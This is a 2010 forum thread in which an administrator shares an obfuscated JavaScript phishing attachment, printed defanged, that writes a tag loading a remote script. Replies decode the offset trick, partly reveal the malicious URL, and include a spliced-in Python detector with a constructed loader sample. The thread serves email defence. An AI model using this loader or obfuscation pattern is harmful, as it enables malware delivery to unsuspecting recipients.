4 Replies Latest reply on Sep 30, 2010 5:12 PM by wecsoc

    e-mail with Obfuscated code


      2 of my users received today an e-mail with a small HTML attachment (72542_attachment.html). It came from a Russian IP ( with a bad reputation and hit an ESP score of 43, and so was delivered.


      That attachment was a small obfuscated JavaScript and evidently, they tried it.  Lucky for us, the local AV stopped it.


      Any idea how to filter out such a script in the future? Blocking JavaScript completely would not be a solution.


      Using a second layer AV gateway, we are filtering some JavaScript commands but, what would be the impact of blocking all JavaScript with document.write(?  We already quarantine JavaScript with document.write(unescape)



      Here is the script, with some underscores added to disable it.

      <script type="text/javascript">
      var s="=tdsjqu!tsd>#iuuq;00ufotjpobdbefnz/ofu0jgsbnfgjmf/kt#?=0tdsjqu?";
      m=""; for (i=0; i<s.length; i++) m+=String.fromChar__Code(s.char__CodeAt(i)-1); document.wr_ite(m);

        • 1. Re: e-mail with Obfuscated code

          I took a brute force approach to this particular spam.  I have some dictionaries that are used for short term purposes.  I de-obfuscated the code and created a new dictionary entry using part of the string that was unlikely to change and unlikely to occur in a legit email.  This isn't a good long-term approach because it's so easy to modify the obfuscation algorithm, but it worked OK short term.

          • 2. Re: e-mail with Obfuscated code

            If I understand you correctly, you de-obfuscated the code, picked a string, and added it to a dictionary, or did you have to re-obfuscate it first?


            What are you using to de-obfuscate the code?


            Thank you

            • 3. Re: e-mail with Obfuscated code

              I just looked at the script and worked through it manually.  As best I can tell, your example converts each character in the string assigned to variable s to the ASCII character that precedes it.  So the substring iuuq;00ufotjpobdbefnz/ translates to http://tensionacademy.  I put in a dictionary entry that included the iuuq;00 section as well as a bit more.  I had to use the literal substring from the script which is why this isn't a great way to defeat this.  All the spammer has to do is change the algorithm to a 2 or 3 or 4 etc. character offset and it passes right through my dictionary.



              Message was edited by: wecsoc  Unlinked the URL on 9/30/10 5:08:21 PM CDT
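              A more general gateway check for this class of obfuscation, as an added example and not something posted in this thread: instead of matching the literal shifted substring, it tries every small character offset, in both directions, on each long string literal in the attachment and flags the file when any decoded form contains a script tag or URL, so a spammer switching from a 1-character to a 2-, 3- or 4-character offset is still caught. The sample attachment, the placeholder URL example.invalid and the function names are constructed for this example.

```python
import re

# Markers an obfuscated payload almost always contains once decoded.
SUSPICIOUS_MARKERS = ("<script", "<iframe", "http://", "https://", "document.write")
MAX_OFFSET = 32  # widest per-character shift worth trying
# A double- or single-quoted JavaScript string literal of 16+ characters.
STRING_LITERAL = re.compile(r'"([^"\n]{16,})"|\'([^\'\n]{16,})\'')

def shift_decode(text, offset):
    """Undo a per-character shift: each char was stored as chr(ord(c) + offset)."""
    return "".join(chr(ord(c) - offset) for c in text if ord(c) >= offset)

def shift_encode(text, offset):
    """Apply the shift; used only to build the constructed sample below."""
    return "".join(chr(ord(c) + offset) for c in text)

def try_offsets(literal, max_offset=MAX_OFFSET):
    """Return (offset, decoded) for the first small shift, in either direction,
    under which the literal decodes to text containing a marker; else None."""
    for offset in range(1, max_offset + 1):
        for signed in (offset, -offset):
            decoded = shift_decode(literal, signed)
            if any(marker in decoded.lower() for marker in SUSPICIOUS_MARKERS):
                return signed, decoded
    return None

def find_shifted_payloads(html):
    """Collect (offset, decoded) for every long string literal in an HTML/JS
    attachment that turns into something suspicious under some small offset."""
    hits = []
    for match in STRING_LITERAL.finditer(html):
        found = try_offsets(match.group(1) or match.group(2))
        if found:
            hits.append(found)
    return hits

def is_suspicious_attachment(html):
    """Gateway verdict: quarantine when any literal decodes to a script or URL."""
    return bool(find_shifted_payloads(html))

# Constructed sample: same decoder shape as the script in the thread, but with
# a placeholder URL and an offset of 3 instead of 1.
SAMPLE_PAYLOAD = '<script src="http://example.invalid/x.js"></script>'
SAMPLE_ATTACHMENT = (
    '<script type="text/javascript">\n'
    'var s="' + shift_encode(SAMPLE_PAYLOAD, 3) + '";\n'
    'm=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-3);'
    ' document.write(m);\n</script>'
)
```

Running find_shifted_payloads on SAMPLE_ATTACHMENT returns the offset 3 and the decoded script tag; a benign literal such as plain English text decodes to nothing suspicious at any offset, so it is not quarantined.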
              • 4. Re: e-mail with Obfuscated code

                Apparently the unlink function isn't working too well, or I'm using the wrong browser.  I tried to deactivate the hyperlink on the partial URL in my above post, but it's still somewhat live for me.